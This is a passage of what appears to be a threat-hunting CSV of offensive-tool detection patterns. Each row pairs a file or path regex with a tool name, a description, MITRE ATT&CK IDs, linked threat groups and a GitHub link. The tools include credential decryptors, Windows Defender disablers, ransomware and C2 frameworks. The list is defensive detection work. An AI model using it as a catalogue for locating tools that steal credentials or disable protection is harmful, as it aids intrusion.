TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","6495" "*/decrypting-lsa-secrets.html*",".{0,1000}\/decrypting\-lsa\-secrets\.html.{0,1000}","offensive_tool_keyword","secretsdump","secretdump.py from impacket - https://github.com/fortra/impacket","T1003.003","TA0006","Operation Wocao","Black Basta - Rhysida - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - ALLANITE","Credential Access","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","6496" "*/Decrypt-RDCMan.ps1*",".{0,1000}\/Decrypt\-RDCMan\.ps1.{0,1000}","offensive_tool_keyword","Decrypt-RDCMan","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/vmamuaya/Powershell/blob/master/Decrypt-RDCMan.ps1","1","1","N/A","N/A","9","1","1","1","2016-12-01T14:06:24Z","2017-11-22T23:18:39Z","6497" "*/DecryptRDCManager.git*",".{0,1000}\/DecryptRDCManager\.git.{0,1000}","offensive_tool_keyword","DecryptRDCManager","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/mez-0/DecryptRDCManager","1","1","N/A","N/A","8","1","73","7","2020-09-29T10:12:58Z","2020-09-29T08:53:46Z","6498" "*/DecryptTeamViewer.exe*",".{0,1000}\/DecryptTeamViewer\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - 
TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6499" "*/DecryptTeamViewer.exe*",".{0,1000}\/DecryptTeamViewer\.exe.{0,1000}","offensive_tool_keyword","DecryptTeamViewer","Enumerate and decrypt TeamViewer credentials from Windows registry","T1552.001 - T1003 - T1119 - T1012","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/V1V1/DecryptTeamViewer","1","1","N/A","N/A","7","3","241","62","2021-12-05T09:19:56Z","2020-02-07T07:50:47Z","6500" "*/DecryptTeamViewer.git*",".{0,1000}\/DecryptTeamViewer\.git.{0,1000}","offensive_tool_keyword","DecryptTeamViewer","Enumerate and decrypt TeamViewer credentials from Windows registry","T1552.001 - T1003 - T1119 - T1012","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/V1V1/DecryptTeamViewer","1","1","N/A","N/A","7","3","241","62","2021-12-05T09:19:56Z","2020-02-07T07:50:47Z","6501" "*/DEDSEC-RANSOMWARE.git*",".{0,1000}\/DEDSEC\-RANSOMWARE\.git.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","1","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","6502" "*/deepce.sh *--install*",".{0,1000}\/deepce\.sh\s.{0,1000}\-\-install.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","6503" "*/deepce.sh*",".{0,1000}\/deepce\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","6504" "*/deepmagic.com_top500prefixes.txt*",".{0,1000}\/deepmagic\.com_top500prefixes\.txt.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#linux","N/A","5","","N/A","","","","6505" "*/deepmagic.com_top50kprefixes.txt*",".{0,1000}\/deepmagic\.com_top50kprefixes\.txt.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#linux","N/A","5","","N/A","","","","6506" "*/defanger.go*",".{0,1000}\/defanger\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#linux","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","6507" "*/DefaultCreds_db.json*",".{0,1000}\/DefaultCreds_db\.json.{0,1000}","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","N/A","10","6048","726","2025-04-15T13:13:19Z","2021-01-01T19:02:36Z","6508" "*/Defeat-Defender-V1.2.0.git*",".{0,1000}\/Defeat\-Defender\-V1\.2\.0\.git.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","6509" "*/Defender Control.zip*",".{0,1000}\/Defender\sControl\.zip.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6510" "*/defender-control.git*",".{0,1000}\/defender\-control\.git.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. 
Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","1","N/A","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","6511" "*/defendercontrol.zip*",".{0,1000}\/defendercontrol\.zip.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6512" "*/defender-exclusions.ps1*",".{0,1000}\/defender\-exclusions\.ps1.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","1","N/A","N/A","10","7","N/A","N/A","N/A","N/A","6513" "*/defender-exclusions/*defender*",".{0,1000}\/defender\-exclusions\/.{0,1000}defender.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","6514" "*/defender-exclusions/*exclusion*",".{0,1000}\/defender\-exclusions\/.{0,1000}exclusion.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - 
EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","6515" "*/defenderOff.rar*",".{0,1000}\/defenderOff\.rar.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6516" "*/DefenderRemover.exe*",".{0,1000}\/DefenderRemover\.exe.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","6517" "*/DefenderRemover-x86.exe*",".{0,1000}\/DefenderRemover\-x86\.exe.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","6518" "*/Defense_Evasion.sh*",".{0,1000}\/Defense_Evasion\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","#linux","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","6519" "*/DelegationBOF/*",".{0,1000}\/DelegationBOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","6520" 
"*/DelegationBOF/*",".{0,1000}\/DelegationBOF\/.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","N/A","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","6521" "*/DeleteonReboot.exe*",".{0,1000}\/DeleteonReboot\.exe.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","Schedules a file to be deleted on next Windows host reboot","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","1","N/A","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","6522" "*/DeleteWD.dll*",".{0,1000}\/DeleteWD\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","6523" "*/deluge-rpc-brute.nse*",".{0,1000}\/deluge\-rpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6524" "*/dementor.py*",".{0,1000}\/dementor\.py.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","6525" "*/demiguise.py*",".{0,1000}\/demiguise\.py.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. 
and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","1","N/A","N/A","9","10","1389","257","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z","6526" "*/demo.specula.com/*",".{0,1000}\/demo\.specula\.com\/.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","1","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","6527" "*/demo_bof.c*",".{0,1000}\/demo_bof\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik 
Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","6528" "*/demon.x64.bin*",".{0,1000}\/demon\.x64\.bin.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","6529" "*/demon.x64.exe*",".{0,1000}\/demon\.x64\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","6530" "*/demon1.dll*",".{0,1000}\/demon1\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","6531" "*/demosyscalls.exe*",".{0,1000}\/demosyscalls\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","6532" "*/Dendrobate.git*",".{0,1000}\/Dendrobate\.git.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","6533" "*/Dendron.bin*",".{0,1000}\/Dendron\.bin.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","6534" "*/Dendron.csproj*",".{0,1000}\/Dendron\.csproj.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation 
tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","6535" "*/Dendron.exe*",".{0,1000}\/Dendron\.exe.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","6536" "*/Dendron.sln*",".{0,1000}\/Dendron\.sln.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","6537" "*/DeNiSe.git*",".{0,1000}\/DeNiSe\.git.{0,1000}","offensive_tool_keyword","DeNiSe","DeNiSe is a proof of concept for tunneling TCP over DNS in Python","T1071.004 - T1048.003","TA0011 - TA0010 - TA0001","N/A","N/A","C2","https://github.com/mdornseif/DeNiSe","1","1","N/A","N/A","10","10","28","13","2021-12-17T18:03:33Z","2010-01-15T07:43:14Z","6538" "*/Dent/*/Loader/Loader.go*",".{0,1000}\/Dent\/.{0,1000}\/Loader\/Loader\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/Dent","1","1","N/A","N/A","10","10","296","46","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z","6539" "*/Dent/Dent.go*",".{0,1000}\/Dent\/Dent\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
